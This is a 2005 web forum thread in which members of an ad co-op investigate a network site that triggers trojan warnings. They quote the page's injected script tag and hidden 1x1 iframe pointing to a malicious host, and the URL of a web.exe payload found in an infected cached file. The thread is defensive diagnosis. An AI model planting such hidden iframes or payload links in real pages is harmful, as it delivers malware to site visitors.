A coop'er with a trojan virus?

Discussion in 'Co-op Advertising Network' started by Gede, May 12, 2005.

  1. #1
    One of the sites in the network give virus warnings when opened, where do I go...

    Virus.moo Trojan.... and tries to Windows open shell scripts etc..

    Can I just post the site, or....
     
    Gede, May 12, 2005 IP
  2. SERPalert

    SERPalert Guest

    Messages:
    1,003
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #2
    I should post it http://www. like this . com and put a big warning

    or pm one of the admins?
     
    SERPalert, May 13, 2005 IP
  3. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Ok

    BIG WARNING

    http://www.onlinemarketingtoday. com/

    Gives me a virus warning when I open the site.

    The site tries to install a Trojan and run wshell scripting stuff.

    Its part of the coop network.

    I use Norton Systemworks, latest updates.
     
    Gede, May 13, 2005 IP
  4. SERPalert

    SERPalert Guest

    Messages:
    1,003
    Likes Received:
    66
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I dare not visit the site.

    I opened notepad, then file > open > the url.

    see:

    
    <!-- *** Paste this into the body of your HTML document *** -->
    <script language=Javascript src=http://www.instantattention.com/js/agjs.aspx?m=190&i=1></script>
    <iframe src='http://www.doce.name/index.php' width=1 height=1></iframe>
    
    Code (markup):
    They're the only bit's that could be 'suspect' imo.
     
    SERPalert, May 13, 2005 IP
  5. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #5
    Yes this doce. name is the cause of the virus..
     
    Gede, May 13, 2005 IP
  6. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #6
    I send an email to the webmaster, maybe this site can be removed from the coop until things are fixed???

    Don't like linking to a site like this...
     
    Gede, May 13, 2005 IP
  7. SEbasic

    SEbasic Peon

    Messages:
    6,317
    Likes Received:
    318
    Best Answers:
    0
    Trophy Points:
    0
    #7
    Until Shawn's online unfortunatley nothing can be done about this...

    I can only initially approve ads, not remove them if something has since been discovered.
     
    SEbasic, May 13, 2005 IP
  8. TommyD

    TommyD Peon

    Messages:
    1,397
    Likes Received:
    76
    Best Answers:
    0
    Trophy Points:
    0
    #8
    Your problem is that you use Norton. IMHO: Since in the past it allowed many 'newer viruses' pass, they have tried to fix this by turning up the sensitivity so high you get many false-positives.

    Check out AVG, they have a free edition too.

    http://free.grisoft.com/freeweb.php/doc/2/

    hth,

    tom
     
    TommyD, May 13, 2005 IP
  9. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #9
    Its not a false positive. It tries to access The Windows Shell Command, and this an error that IE gives.

    I never had "false positives" ever with Norton.
     
    Gede, May 13, 2005 IP
  10. digitalpoint

    digitalpoint Overlord of no one Staff

    Messages:
    38,334
    Likes Received:
    2,613
    Best Answers:
    462
    Trophy Points:
    710
    Digital Goods:
    29
    #10
    Can anyone else confirm it?
     
    digitalpoint, May 13, 2005 IP
  11. SEbasic

    SEbasic Peon

    Messages:
    6,317
    Likes Received:
    318
    Best Answers:
    0
    Trophy Points:
    0
    #11
    I just went again and had no problems...

    Also, that site I have used for a very long time now and I don't think Duncan would ever intentionally add viruses to his site.
     
    SEbasic, May 13, 2005 IP
  12. palespyder

    palespyder Psycho Ninja

    Messages:
    1,254
    Likes Received:
    98
    Best Answers:
    0
    Trophy Points:
    168
    #12
    I get nothing when I goto the site, I am using Norton 2005. It is just a normal site, it does have a popup, but, not anything malicious that I can see.
     
    palespyder, May 13, 2005 IP
  13. debunked

    debunked Prominent Member

    Messages:
    7,298
    Likes Received:
    416
    Best Answers:
    0
    Trophy Points:
    310
    #13
    I get an intrusion attempt: www*instantattention*com attacking port 2692 (netscape cookie moster)

    When I search for that it is some sort of pop-up that gets past blockers, but it doesn't work for me HA HA
     
    debunked, May 13, 2005 IP
  14. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #14
    Am I the only one???

    :

    [​IMG]

    :

    [​IMG]


    :

    ??
     
    Gede, May 13, 2005 IP
  15. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #15
    Gede, May 13, 2005 IP
  16. GTech

    GTech Rob Jones for President!

    Messages:
    15,836
    Likes Received:
    571
    Best Answers:
    0
    Trophy Points:
    0
    #16
    Yes, I can comfirm it. If you visit the site with FireFox, nothing seems to happen.

    When I use IE to visit the site, I scanned my documents/settings folder with Kaspersky and it found a file called "counter[1].ani" as being infected.

    When opening the file with notepad.exe, towards the bottom, it has:

    http://doce.name/ traffic/ web.exe

    Warning - That file is currently present.

    After removing the file from my temp internet files, I went back to the site with FireFox and then rescanned my docs/settings folder and nothing is present. Then I went back with IE and rescanned with Kaspersky and again, it found the same filename: counter[1].ani

    It seems to be detecting the browser being used and taking action based upon that.
     
    GTech, May 13, 2005 IP
  17. Gede

    Gede Peon

    Messages:
    141
    Likes Received:
    5
    Best Answers:
    0
    Trophy Points:
    0
    #17
    Now what?

    The site is still in the coop, I mailed the webmaster, I even posted on his forum?
     
    Gede, May 15, 2005 IP
  18. TommyD

    TommyD Peon

    Messages:
    1,397
    Likes Received:
    76
    Best Answers:
    0
    Trophy Points:
    0
    #18
    You know what, I might not be getting the same virus/trojan alert since I block most activex features. I think AVG even runs interference, therefore I don't receive the 'bad' code, so I don't get the warning.

    Just thinking out loud.

    tom
     
    TommyD, May 15, 2005 IP